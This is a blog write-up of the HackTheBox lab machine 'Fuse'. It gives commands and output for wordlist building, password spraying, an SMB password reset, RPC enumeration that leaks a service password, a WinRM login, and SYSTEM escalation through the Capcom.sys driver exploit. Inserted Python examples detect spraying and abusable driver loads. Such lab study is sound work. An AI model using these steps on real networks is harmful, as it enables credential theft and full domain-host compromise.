Hackthebox - Fuse

Summary

Fuse is a medium Windows box created by egre55. The initial foothold comes from the company's automatic printer install process: its web page leaks usernames, a wordlist built from that page gives us an expired credential for one user, and after resetting that password we can enumerate over RPC, which reveals the credential of the printer service account and gets us a shell on the box. Checking that account's privileges we see it can load drivers, so we load a driver that lets us execute commands as SYSTEM for privilege escalation.

Initial Enumeration

nmap

# Nmap 7.80 scan initiated Sun Aug 30 08:55:56 2020 as: nmap -sC -sV -oN nmap/fuse 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-30 03:39:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/30%Time=5F4B1C55%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m02s, deviation: 4h02m29s, median: 13m02s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Fuse
| NetBIOS computer name: FUSE\x00
| Domain name: fabricorp.local
| Forest name: fabricorp.local
| FQDN: Fuse.fabricorp.local
|_ System time: 2020-08-29T20:41:29-07:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-08-30T03:41:32
|_ start_date: 2020-08-29T14:55:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 30 09:01:06 2020 -- 1 IP address (1 host up) scanned in 309.93 seconds

Web (Port: 80)

Visiting http://10.10.10.193 redirects us to http://fuse.fabricorp.local/

Enumerating the web page we find some usernames:

pmerton
tlavel
sthompson
bhult
administrator

Since we have usernames, let's build a password wordlist from the site with cewl:

cewl -d 5 -m 3 -w wordlist-withNumbers http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

SMB

Password spraying over SMB with crackmapexec gets a hit for tlavel with the password Fabricorp01, along with a message that the password must be changed.

So let's use smbpasswd to change the password:

smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

Connecting with rpcclient and enumerating, we can list all the domain users with enumdomusers:

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

Checking enumprinters we find a new password: $fab@s3Rv1ce$1

This was the part I hated the most about this box, as the password keeps resetting.

Let's password spray again and see if this password gives us any valid login.

Shell (svc-print)

crackmapexec winrm 10.10.10.193 -u loot/users.list  -p '$fab@s3Rv1ce$1'
WINRM 10.10.10.193 5985 FUSE [*] http://10.10.10.193:5985/wsman
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM 10.10.10.193 5985 FUSE [-] FABRICORP\administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user administrator with ntlm"
WINRM 10.10.10.193 5985 FUSE [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

This gives us a credential for WinRM, which we use to get a shell.
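The two sprays above are the attacker's view; the defender's counterpart is noticing one source failing against many distinct accounts in a short window and then succeeding. The following Python is an added example, not part of the original write-up: the logon records are constructed to mimic this spray, and their pipe-separated layout is an assumption rather than a real Windows event export.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records: "<ISO time>|<EventID>|<TargetUserName>|<IpAddress>"
# 4625 = failed logon, 4624 = successful logon. One source tries many users
# once each (a spray) and then lands on svc-print; another just mistypes.
SAMPLE_EVENTS = """\
2020-08-30T09:10:01|4625|pmerton|10.10.14.5
2020-08-30T09:10:02|4625|tlavel|10.10.14.5
2020-08-30T09:10:02|4625|sthompson|10.10.14.5
2020-08-30T09:10:03|4625|bhult|10.10.14.5
2020-08-30T09:10:03|4625|administrator|10.10.14.5
2020-08-30T09:10:04|4624|svc-print|10.10.14.5
2020-08-30T09:12:00|4625|dmuir|10.10.14.9
2020-08-30T09:12:30|4625|dmuir|10.10.14.9
"""

def parse_events(text):
    """Turn the constructed records into (time, event_id, user, source_ip)."""
    events = []
    for line in text.splitlines():
        ts, eid, user, ip = line.split("|")
        events.append((datetime.fromisoformat(ts), int(eid), user.lower(), ip))
    return events

def find_sprays(events, window=timedelta(minutes=5), min_users=4):
    """Return {source_ip: (distinct users failed, users that later succeeded)}
    for every source failing against at least min_users accounts in one window.
    Brute force hammers one account and trips lockout; a spray touches many
    accounts once, so the signal is distinct usernames per source."""
    by_src = defaultdict(list)
    for ev in sorted(events):
        by_src[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_src.items():
        fails = [(ts, user) for ts, eid, user, _ in evs if eid == 4625]
        for i, (start, _) in enumerate(fails):
            users = {u for ts, u in fails[i:] if ts - start <= window}
            if len(users) >= min_users:
                # A success from the same source after the spray began is
                # the account the attacker actually got into.
                won = sorted(u for ts, eid, u, _ in evs if eid == 4624 and ts >= start)
                alerts[ip] = (len(users), won)
                break
    return alerts

if __name__ == "__main__":
    for ip, (n, won) in find_sprays(parse_events(SAMPLE_EVENTS)).items():
        print(f"{ip}: {n} distinct accounts failed, then succeeded as {won or 'none'}")
```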

Privilege Escalation

Checking whoami /all for any interesting groups or privileges:

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Searching for ways to abuse any of these privileges, we find that SeLoadDriverPrivilege can be abused for privilege escalation:

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

After a lot of Google-fu I found Capcom.sys and ExploitCapcom.

I did that because I didn't want to compile it locally.

Uploading those files,

and running these commands to load the driver and exploit it:

.\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys
.\ExploitCapcom.exe EXPLOIT whoami

We see we can execute commands as nt authority\system.

I uploaded a metasploit shell and executed it with

.\ExploitCapcom.exe EXPLOIT shell.exe

to get a shell,

and we can read root.txt.
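Microsoft documents "Load and unload device drivers" as a sensitive right that is effectively equivalent to administrative access, so a service account like svc-print should never hold it; beyond fixing that assignment, the load itself leaves a trace in driver-load telemetry. The following Python is an added example, not from the write-up: it flags a driver loaded from outside the normal driver directories, with a name known to be abused, or without a valid signature, over constructed records whose fields are a simplified assumption of Sysmon Event ID 6 ("Driver loaded").

```python
from pathlib import PureWindowsPath

# Constructed sample records (not real telemetry), shaped after Sysmon's
# Event ID 6 "Driver loaded" fields: a normal Windows driver, the write-up's
# Capcom.sys placed in the colour-profile spool directory, and an unsigned
# file loaded from a user profile.
SAMPLE_DRIVER_LOADS = [
    {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Windows\System32\spool\drivers\color\Capcom.sys",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"ImageLoaded": r"C:\Users\svc-print\Documents\helper.sys",
     "Signed": "false", "SignatureStatus": "Unsigned"},
]

# Directories that legitimately hold kernel drivers on a default install.
EXPECTED_DRIVER_DIRS = (r"c:\windows\system32\drivers",
                        r"c:\windows\system32\driverstore")
# Driver file names known to be abused for SeLoadDriverPrivilege escalation;
# only the one named in this write-up is listed here.
KNOWN_ABUSED_DRIVERS = {"capcom.sys"}

def assess_driver_load(rec):
    """Return the list of reasons this load is suspicious (empty if none).
    Capcom.sys shipped with a legitimate vendor signature, so a signature
    check alone is not enough; the odd path and the known name catch it."""
    path = PureWindowsPath(rec["ImageLoaded"])
    reasons = []
    if not str(path.parent).lower().startswith(EXPECTED_DRIVER_DIRS):
        reasons.append("loaded from outside the driver directories")
    if path.name.lower() in KNOWN_ABUSED_DRIVERS:
        reasons.append("known abusable driver name")
    if rec["Signed"].lower() != "true" or rec["SignatureStatus"] != "Valid":
        reasons.append("unsigned or invalid signature")
    return reasons

def suspicious_loads(records):
    """Map each suspicious ImageLoaded path to its list of reasons."""
    result = {}
    for rec in records:
        reasons = assess_driver_load(rec)
        if reasons:
            result[rec["ImageLoaded"]] = reasons
    return result

if __name__ == "__main__":
    for image, reasons in suspicious_loads(SAMPLE_DRIVER_LOADS).items():
        print(f"{image}: {'; '.join(reasons)}")
```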

and we have pwned Fuse 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/fuse/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.